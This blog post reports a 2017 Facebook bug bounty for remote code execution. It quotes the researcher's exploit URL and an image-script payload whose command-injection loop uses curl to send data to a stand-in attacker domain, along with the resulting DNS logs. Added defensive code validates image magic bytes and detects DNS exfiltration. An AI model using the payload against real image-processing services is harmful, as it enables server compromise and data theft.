Wednesday, 18 January 2017

Facebook Awarded $40,000 Bug Bounty For Remote Code Execution Vulnerability


Facebook Awarded $40,000 Bug Bounty to Security Researcher For Remote Code Execution Vulnerability.


Yes, you heard right: it's $40,000, and it's the highest bug bounty Facebook has ever paid. Andrey Leonov, a security researcher, discovered a remote code execution vulnerability in Facebook and reported it to the company.

He said in his blog that the vulnerability was found by accident, after another service redirected him to a Facebook page:

Once upon a time, on a Saturday in October, I was testing some big service (not Facebook) when some redirect sent me to Facebook. It was a «Share on Facebook» dialog:

Exploit URL:

https://www.facebook.com/dialog/feed?app_id=APP_ID&link=link.example.tld&picture=http%3A%2F%2Fattacker.tld%2Fexploit.png&name=news_name&caption=news_caption&description=news_descriotion&redirect_uri=http%3A%2F%2Fwww.facebook.com&ext=1476569763&hash=Aebid3vZFdh4UF1H

Payload:

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://127.0.0.1/x.php?x=%60for i in $(ls /) ; do curl "http://$i.attacker.tld/" -d @- > /dev/null; done`'
pop graphic-context

And result was:

NAME: home.attacker.tld, Type: A
NAME: boot.attacker.tld, Type: 28
NAME: dev.attacker.tld, Type: 28
NAME: bin.attacker.tld, Type: A

and so on...

`id` shell command returned:

NAME: uid=99(nobody).attacker.tld., Type: 28
NAME: groups=99(nobody).attacker.tld., Type: A
NAME: gid=99(nobody).attacker.tld., Type: A

As full proof that the exploit worked, he provided the Facebook security team with the output of `cat /proc/version`, which he is not going to publish in his blog.
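The payload above is a text-based vector script served under a ".png" name: an image library that sniffs the format from the content rather than trusting the extension will parse it as a script instead of decoding a raster. The first defensive check on any remotely fetched `picture` URL is therefore whether the bytes actually match the declared type. The following validator is an added example written for this post; it is not Facebook's fix and not code from Andrey Leonov's blog. The signatures are the published PNG/JPEG/GIF magic bytes; the sample inputs, the `attacker.tld` URL and the script markers it looks for are constructed for the demonstration.

```python
"""Magic-byte validation for fetched images (added example, not the page's code)."""
from typing import Optional, Tuple
from urllib.parse import urlparse

# Published magic bytes for the raster formats this hypothetical service accepts.
SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Text-based "image" formats are really instruction lists for an interpreter.
# A converter that identifies formats by content will treat them as scripts.
SCRIPT_MARKERS = (b"push graphic-context", b"viewbox", b"<svg", b"<?xml")

EXT_ALIASES = {"jpg": "jpeg", "jpe": "jpeg"}

# Constructed samples (not the researcher's captures). The script sample keeps
# the structure of the quoted payload but carries no command.
MVG_SAMPLE = (
    b"push graphic-context\n"
    b"viewbox 0 0 640 480\n"
    b"image over 0,0 0,0 'https://127.0.0.1/x.php'\n"
    b"pop graphic-context\n"
)
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR" + b"\x00" * 13
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"


def declared_extension(url: str) -> str:
    """Extension the caller *claims* via the URL path, e.g. 'png' for .../exploit.png."""
    path = urlparse(url).path
    ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""
    return EXT_ALIASES.get(ext, ext)


def sniff_format(data: bytes) -> Optional[str]:
    """Identify the content by its leading bytes, ignoring name and MIME header."""
    head = data[:64]
    for fmt, sigs in SIGNATURES.items():
        if any(head.startswith(s) for s in sigs):
            return fmt
    lowered = head.lstrip().lower()
    if any(lowered.startswith(m) for m in SCRIPT_MARKERS):
        return "script"
    return None


def validate_image(data: bytes, declared_ext: str) -> Tuple[bool, str]:
    """Accept only an allow-listed raster whose content matches the declared type."""
    declared = declared_ext.lower().lstrip(".")
    declared = EXT_ALIASES.get(declared, declared)
    sniffed = sniff_format(data)
    if sniffed is None:
        return False, "unrecognised content; refusing to hand it to a decoder"
    if sniffed == "script":
        return False, "content is a vector/script format, not a raster image"
    if sniffed != declared:
        return False, f"declared .{declared} but content is {sniffed}"
    return True, f"{sniffed} content matches declared type"


if __name__ == "__main__":
    # Hypothetical URL in the shape of the quoted picture parameter.
    ext = declared_extension("http://attacker.tld/exploit.png")
    print(validate_image(MVG_SAMPLE, ext))    # rejected: script, not png
    print(validate_image(PNG_SAMPLE, ext))    # accepted
    print(validate_image(JPEG_SAMPLE, ext))   # rejected: jpeg served as png
```

The check runs before any decoder sees the bytes, which is the point: the Content-Type header and the file name are both under the remote server's control, so only the content itself can be trusted to say what it is.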

The vulnerability has been patched by the Facebook team, and it is secure for now.
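The results quoted above also show what the exploit looks like from the network side: each piece of command output became a subdomain label in a DNS lookup against a domain the researcher controlled. The detector below is an added example for this post, not a tool from the original report or from Facebook; it reads lines in the same "NAME: ..., Type: ..." shape, flags labels that cannot be ordinary hostnames (RFC 1035 labels are letters, digits and hyphens only), and flags a parent domain that suddenly receives many distinct subdomain queries. The log lines and the `attacker.tld` / `example.org` names are constructed.

```python
"""DNS exfiltration detection over query-log lines (added example, not the page's code)."""
import re
from collections import defaultdict
from typing import Dict, List

# Constructed sample in the shape of the quoted results; not the researcher's captures.
# Type 28 is an AAAA query, Type A an IPv4 address query.
SAMPLE_LOG = """\
NAME: www.example.org., Type: A
NAME: home.attacker.tld, Type: A
NAME: boot.attacker.tld, Type: 28
NAME: dev.attacker.tld, Type: 28
NAME: bin.attacker.tld, Type: A
NAME: uid=99(nobody).attacker.tld., Type: 28
NAME: groups=99(nobody).attacker.tld., Type: A
NAME: mail.example.org., Type: A
"""

LINE_RE = re.compile(r"NAME:\s*(?P<name>\S+),\s*Type:\s*(?P<type>\S+)")
# Characters outside this set inside a label ('=', parentheses, '/', spaces)
# are a strong sign of data being smuggled rather than a host being resolved.
LABEL_RE = re.compile(r"^[A-Za-z0-9-]+$")


def parse_queries(log: str) -> List[str]:
    """Return the queried names with any trailing root dot removed."""
    names = []
    for line in log.splitlines():
        m = LINE_RE.search(line)
        if m:
            names.append(m.group("name").rstrip("."))
    return names


def find_exfil(log: str, distinct_threshold: int = 4) -> Dict[str, object]:
    """Flag malformed labels and parent domains with many distinct subdomains.

    The two-label "registered domain" split is a simplification for the
    example; a production detector would use the public suffix list.
    """
    malformed: List[str] = []
    subdomains: Dict[str, set] = defaultdict(set)
    for name in parse_queries(log):
        labels = name.split(".")
        if any(not LABEL_RE.match(label) for label in labels):
            malformed.append(name)
        if len(labels) > 2:
            parent = ".".join(labels[-2:])
            subdomains[parent].add(".".join(labels[:-2]))
    enumeration = {d: len(s) for d, s in subdomains.items() if len(s) >= distinct_threshold}
    return {"malformed_labels": malformed, "enumeration": enumeration}


if __name__ == "__main__":
    result = find_exfil(SAMPLE_LOG)
    for name in result["malformed_labels"]:
        print("smuggled data in label:", name)
    for domain, count in result["enumeration"].items():
        print(f"{count} distinct subdomains queried under {domain}")
```

The label check catches the `id` output directly, while the distinct-subdomain count is what catches the directory listing, whose labels (`home`, `boot`, `dev`, `bin`) each look perfectly normal on their own.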

The HOC team congratulates Andrey Leonov on the bounty award; keep up the bug hunting in future.
